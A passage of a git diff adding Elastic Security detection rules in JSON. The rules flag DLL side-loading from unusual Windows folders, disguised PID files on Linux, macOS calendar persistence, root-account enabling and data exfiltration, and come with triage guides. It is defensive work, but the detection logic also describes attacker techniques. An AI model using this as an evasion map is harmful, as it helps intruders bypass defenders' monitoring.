\"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "dll.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_8.json b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_8.json new file mode 100644 index 00000000000..cc303153257 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ca98c7cf-a56e-4057-a4e8-39603f7f0389_8.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a Windows trusted program running from locations often abused by adversaries to masquerade as a trusted program and loading a recently dropped DLL. This behavior may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of a signed processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unsigned DLL Side-Loading from a Suspicious Folder", + "query": "library where host.os.type == \"windows\" and\n\n process.code_signature.trusted == true and \n \n (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\") and \n \n /* Suspicious Paths */\n dll.path : (\"?:\\\\PerfLogs\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Pictures\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Music\\\\*.dll\",\n \"?:\\\\Users\\\\Public\\\\*.dll\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\*.dll\",\n \"?:\\\\Windows\\\\Tasks\\\\*.dll\",\n \"?:\\\\Windows\\\\System32\\\\Tasks\\\\*.dll\",\n \"?:\\\\Intel\\\\*.dll\",\n \"?:\\\\AMD\\\\Temp\\\\*.dll\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceState\\\\*.dll\",\n \"?:\\\\Windows\\\\security\\\\*.dll\",\n\t\t \"?:\\\\Windows\\\\System\\\\*.dll\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*.dll\",\n \"?:\\\\Windows\\\\Branding\\\\*.dll\",\n \"?:\\\\Windows\\\\csc\\\\*.dll\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*.dll\",\n \"?:\\\\Windows\\\\en-US\\\\*.dll\",\n \"?:\\\\Windows\\\\wlansvc\\\\*.dll\",\n \"?:\\\\Windows\\\\Prefetch\\\\*.dll\",\n \"?:\\\\Windows\\\\Fonts\\\\*.dll\",\n \"?:\\\\Windows\\\\diagnostics\\\\*.dll\",\n \"?:\\\\Windows\\\\TAPI\\\\*.dll\",\n \"?:\\\\Windows\\\\INF\\\\*.dll\",\n \"?:\\\\windows\\\\tracing\\\\*.dll\",\n \"?:\\\\windows\\\\IME\\\\*.dll\",\n \"?:\\\\Windows\\\\Performance\\\\*.dll\",\n \"?:\\\\windows\\\\intel\\\\*.dll\",\n \"?:\\\\windows\\\\ms\\\\*.dll\",\n \"?:\\\\Windows\\\\dot3svc\\\\*.dll\",\n \"?:\\\\Windows\\\\ServiceProfiles\\\\*.dll\",\n \"?:\\\\Windows\\\\panther\\\\*.dll\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*.dll\",\n \"?:\\\\Windows\\\\OCR\\\\*.dll\",\n \"?:\\\\Windows\\\\appcompat\\\\*.dll\",\n \"?:\\\\Windows\\\\apppatch\\\\*.dll\",\n \"?:\\\\Windows\\\\addins\\\\*.dll\",\n \"?:\\\\Windows\\\\Setup\\\\*.dll\",\n \"?:\\\\Windows\\\\Help\\\\*.dll\",\n \"?:\\\\Windows\\\\SKB\\\\*.dll\",\n \"?:\\\\Windows\\\\Vss\\\\*.dll\",\n \"?:\\\\Windows\\\\Web\\\\*.dll\",\n \"?:\\\\Windows\\\\servicing\\\\*.dll\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*.dll\",\n \"?:\\\\Windows\\\\Logs\\\\*.dll\",\n \"?:\\\\Windows\\\\WaaS\\\\*.dll\",\n \"?:\\\\Windows\\\\twain_32\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*.dll\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*.dll\",\n \"?:\\\\Windows\\\\PLA\\\\*.dll\",\n \"?:\\\\Windows\\\\Migration\\\\*.dll\",\n \"?:\\\\Windows\\\\debug\\\\*.dll\",\n \"?:\\\\Windows\\\\Cursors\\\\*.dll\",\n \"?:\\\\Windows\\\\Containers\\\\*.dll\",\n \"?:\\\\Windows\\\\Boot\\\\*.dll\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*.dll\",\n \"?:\\\\Windows\\\\TextInput\\\\*.dll\",\n \"?:\\\\Windows\\\\schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\SchCache\\\\*.dll\",\n \"?:\\\\Windows\\\\Resources\\\\*.dll\",\n \"?:\\\\Windows\\\\rescache\\\\*.dll\",\n \"?:\\\\Windows\\\\Provisioning\\\\*.dll\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*.dll\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*.dll\",\n \"?:\\\\Windows\\\\media\\\\*.dll\",\n \"?:\\\\Windows\\\\Globalization\\\\*.dll\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*.dll\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*.dll\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*.dll\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*.dll\",\n \"?:\\\\$Recycle.Bin\\\\*.dll\") and \n\t \n\t /* DLL loaded from the process.executable current directory */\n\t endswith~(substring(dll.path, 0, length(dll.path) - (length(dll.name) + 1)), substring(process.executable, 0, length(process.executable) - (length(process.name) + 1)))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "dll.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "ca98c7cf-a56e-4057-a4e8-39603f7f0389_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_213.json b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_213.json new file mode 100644 index 00000000000..f3e8112e176 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cac91072-d165-11ec-a764-f661ea17fbce_213.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files.", + "false_positives": [ + "False-Positives (FP) can appear if the PID file is legitimate and holding a process ID as intended. To differentiate, if the PID file is an executable or larger than 10 bytes, it should be ruled suspicious." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Abnormal Process ID or Lock File Created", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "note": "## Triage and analysis\n\n### Investigating Abnormal Process ID or Lock File Created\n\nLinux applications may need to save their process identification number (PID) for various purposes: from signaling that a program is running to serving as a signal that a previous instance of an application didn't exit successfully. PID files contain its creator process PID in an integer value.\n\nLinux lock files are used to coordinate operations in files so that conflicts and race conditions are prevented.\n\nThis rule identifies the creation of PID, lock, or reboot files in the /var/run/ directory. Attackers can masquerade malware, payloads, staged data for exfiltration, and more as legitimate PID files.\n\n#### Possible investigation steps\n\n- Retrieve the file and determine if it is malicious:\n - Check the contents of the PID files. They should only contain integer strings.\n - Check the file type of the lock and PID files to determine if they are executables. This is only observed in malicious files.\n - Check the size of the subject file. Legitimate PID files should be under 10 bytes.\n - Check if the lock or PID file has high entropy. This typically indicates an encrypted payload.\n - Analysts can use tools like `ent` to measure entropy.\n - Examine the reputation of the SHA-256 hash in the PID file. Use a database like VirusTotal to identify additional pivots and artifacts for investigation.\n- Trace the file's creation to ensure it came from a legitimate or authorized process.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- False positives can appear if the PID file is legitimate and holding a process ID as intended. If the PID file is an executable or has a file size that's larger than 10 bytes, it should be ruled suspicious.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of file name and process executable conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.category:file and event.action:(creation or file_create_event) and\nuser.id:0 and file.extension:(pid or lock or reboot) and file.path:(/var/run/* or /run/*) and (\n (process.name : (\n bash or dash or sh or tcsh or csh or zsh or ksh or fish or ash or touch or nano or vim or vi or editor or mv or cp)\n ) or (\n process.executable : (\n ./* or /tmp/* or /var/tmp/* or /dev/shm/* or /var/run/* or /boot/* or /srv/* or /run/*\n ))\n) and not process.name : (go or git or containerd* or snap-confine or cron or crond or sshd or unattended-upgrade or \nvzctl or ifup or rpcbind or runc or gitlab-runner-helper or elastic-agent or metricbeat) and\nnot file.name : (jem.*.pid)\n", + "references": [ + "https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/", + "https://twitter.com/GossiTheDog/status/1522964028284411907", + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cac91072-d165-11ec-a764-f661ea17fbce", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 213 + }, + "id": "cac91072-d165-11ec-a764-f661ea17fbce_213", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106.json b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106.json new file mode 100644 index 00000000000..09bdacd1a1e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious modifications of the calendar file by an unusual process. Adversaries may create a custom calendar notification procedure to execute a malicious program at a recurring interval to establish persistence.", + "false_positives": [ + "Trusted applications for managing calendars and reminders." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious Calendar File Modification", + "query": "event.category:file and host.os.type:macos and event.action:modification and\n file.path:/Users/*/Library/Calendars/*.calendar/Events/*.ics and\n process.executable:\n (* and not\n (\n /System/Library/* or\n /System/Applications/Calendar.app/Contents/MacOS/* or\n /System/Applications/Mail.app/Contents/MacOS/Mail or\n /usr/libexec/xpcproxy or\n /sbin/launchd or\n /Applications/*\n )\n )\n", + "references": [ + "https://labs.f-secure.com/blog/operationalising-calendar-alerts-persistence-on-macos", + "https://github.com/FSecureLABS/CalendarPersist", + "https://github.com/D00MFist/PersistentJXA/blob/master/CalendarPersist.js" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_106.json b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_106.json new file mode 100644 index 00000000000..7187ff683a4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cc2fd2d0-ba3a-4939-b87f-2901764ed036_106.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to enable the root account using the dsenableroot command. This command may be abused by adversaries for persistence, as the root account is disabled by default.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Enable the Root Account", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:dsenableroot and not process.args:\"-d\"\n", + "references": [ + "https://ss64.com/osx/dsenableroot.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cc2fd2d0-ba3a-4939-b87f-2901764ed036", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "cc2fd2d0-ba3a-4939-b87f-2901764ed036_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_3.json b/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_3.json new file mode 100644 index 00000000000..e5cfece1f36 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cc653d77-ddd2-45b1-9197-c75ad19df66c_3.json @@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels.", + "from": "now-6h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_sent_bytes_destination_ip", + "name": "Potential Data Exfiltration Activity to an Unusual IP Address", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "cc653d77-ddd2-45b1-9197-c75ad19df66c", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. \n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic 